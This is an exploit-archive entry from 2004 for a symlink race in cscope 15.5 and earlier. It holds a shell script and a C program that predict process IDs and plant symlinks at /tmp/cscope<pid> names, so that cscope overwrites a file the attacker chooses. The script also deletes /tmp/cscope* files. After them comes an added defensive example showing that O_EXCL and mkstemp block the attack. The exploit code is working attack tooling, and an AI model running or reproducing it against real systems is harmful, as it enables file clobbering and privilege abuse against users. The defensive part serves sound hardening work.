Cscope version 15.5 and minor Exploit
Source: www.rexotec.com  Author: research  Published: 2004-11-20


#!/bin/sh
#################################################################
# RXcscope_proof.sh
# brute force case baby
# cscope advisory and exploit by Gangstuck / Psirac <research@rexotec.com>
#################################################################

HOWM=30
CURR=`ps | grep ps | awk '{print $1}'`
NEXT=`expr $CURR + 5 + $HOWM \* 2 + 1`
LAST=`expr $NEXT + $HOWM`

echo -e "\n--= Cscope Symlink Vulnerability Exploitation =--\n"\
" [versions 15.5 and minor]\n"\
" Gangstuck / Psirac\n"\
" <research@rexotec.com>\n\n"

if [ $# -lt 1 ]; then
    echo "Usage: $0 <file1> [number_of_guesses]"
    exit 1
fi

rm -f /tmp/cscope*

echo "Probed next process id ........ [${NEXT}]"

while [ ! "$NEXT" -eq "$LAST" ]; do
    ln -s $1 /tmp/cscope${NEXT}.1; NEXT=`expr $NEXT + 1`
    ln -s $1 /tmp/cscope${NEXT}.2; NEXT=`expr $NEXT + 1`
done

---8<--------8<-------cut-here-------8<---------8<---

/* RXcscope exploit version 15.5 and minor */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BSIZE 64

int
main(int ac, char *av[]) {
    pid_t cur;
    u_int i=0, lst;
    char buffer[BSIZE + 1];

    fprintf(stdout, "\n --[ Cscope Exploit ]--\n"\
        " version 15.5 and minor \n" \
        " Gangstuck / Psirac\n" \
        " <research@rexotec.com>\n\n");

    if (ac != 3) {
        fprintf(stderr, "Usage: %s <target> <max file creation>\n", av[0]);
        return 1;
    }

    cur=getpid();
    lst=cur+atoi(av[2]);

    fprintf(stdout, " -> Current process id is ..... [%5d]\n" \
        " -> Last process id is ........ [%5d]\n", cur, lst);

    while (++cur != lst) {
        snprintf(buffer, BSIZE, "%s/cscope%d.%d", P_tmpdir, cur, (i==2) ? --i : ++i);
        symlink(av[1], buffer);
    }

    return 0;
}
}
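
Defensive counterpart, added here as an example (not part of the original advisory and not cscope's own code): both programs above pre-create symlinks at the guessable names /tmp/cscope<pid>.1 and /tmp/cscope<pid>.2, which only pays off against a temp file that is opened by name without O_EXCL. The function names, the private test directory and the constructed name cscope1234.1 are assumptions made for illustration.

```c
#define _XOPEN_SOURCE 700   /* O_NOFOLLOW, mkdtemp, mkstemp */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Weak pattern (assumed shape of the flaw): a guessable name opened without
 * O_EXCL. A symlink planted at that name redirects the write to its target. */
int open_predictable(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened: O_EXCL fails with EEXIST if the name already exists, symlinks
 * included (even dangling ones); O_NOFOLLOW is an extra guard. */
int open_exclusive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Preferred: mkstemp() picks a random name and creates it with O_EXCL, 0600.
 * tmpl must end in "XXXXXX" and is rewritten with the chosen name. */
int open_unpredictable(char *tmpl) {
    return mkstemp(tmpl);
}

/* Plants a symlink at a constructed PID-style name inside a private directory,
 * runs one opener on it, and returns the victim file's size afterwards:
 * 4 = untouched, 0 = truncated through the link, -1 = setup error. */
long victim_size_after(int (*opener)(const char *)) {
    char dir[] = "/tmp/symdemoXXXXXX", victim[64], name[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(name, sizeof name, "%s/cscope1234.1", dir);
    int fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || write(fd, "keep", 4) != 4 || symlink(victim, name) != 0)
        return -1;
    close(fd);
    fd = opener(name);
    if (fd >= 0) close(fd);
    long size = (stat(victim, &st) == 0) ? (long)st.st_size : -1;
    unlink(name); unlink(victim); rmdir(dir);
    return size;
}

int main(void) {
    printf("no O_EXCL: victim size %ld\n", victim_size_after(open_predictable));
    printf("O_EXCL:    victim size %ld\n", victim_size_after(open_exclusive));
    return 0;
}
```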



 